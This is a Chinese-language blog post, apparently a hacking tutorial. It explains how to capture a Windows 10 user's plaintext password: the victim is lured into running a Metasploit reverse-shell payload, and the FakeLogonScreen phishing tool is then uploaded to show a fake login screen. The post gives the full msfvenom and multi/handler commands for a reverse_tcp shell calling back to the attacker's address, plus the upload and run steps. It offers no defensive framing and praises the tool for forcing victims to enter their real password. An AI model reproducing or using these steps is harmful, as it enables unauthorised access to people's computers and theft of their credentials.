在先前的讨论中,我们提到了利用Mimikatz和Kiwi获取Windows明文密码的方法。然而,这种方式只适用于Windows 7系统。在更高版本的Windows 10和11中,该方法已失效。本文将介绍利用FakeLogonScreen和破解Windows 10密码的方法。
关于FakeLogonScreen
FakeLogonScreen是一种钓鱼工具,可以在目标Windows 10计算机的屏幕上创建虚假的登录页面。当受害者输入密码后,该密码将传递给攻击者。与其他钓鱼工具不同的是,只有用户输入了正确的密码,才能进入系统。
攻击思路
- 利用Metasploit生成shell,诱使用户点击并获取相应的shell。
- 上传FakeLogonScreen文件。当文件运行后,即可诱使用户输入密码。
接下来,我们下载FakeLogonScreen文件:项目地址https://github.com/bitsadmin/fakelogonscreen/releases。
然后利用Metasploit生成shell:
bash复制msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.50.123 lport=4444 -f exe >> payload.exe
接下来配置Metasploit终端:
bash复制use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.50.123 set lport 4444 run
当目标运行shell后,我们成功得到回弹。接着将之前下载的FakeLogonScreen文件上传到目标主机:
bash复制upload /root/Downloads/FakeLogonScreen.exe
完成后,访问shell并运行FakeLogonScreen.exe。
此时在目标计算机上,所有正在运行的窗口都将关闭,并且会出现一个登录屏幕,要求提供凭据。
为了测试这个工具的可靠性,我们输入错误的密码。它会显示“密码错误,请重试”。这正是FakeLogonScreen工具的强大之处,它强制目标输入正确的密码,用户别无选择,只能输入正确的密码。
需要注意的是,FakeLogonScreen与Metasploit的配合非常好,输入的密码信息我们可以直接在Metasploit的终端中查看!
暂无评论内容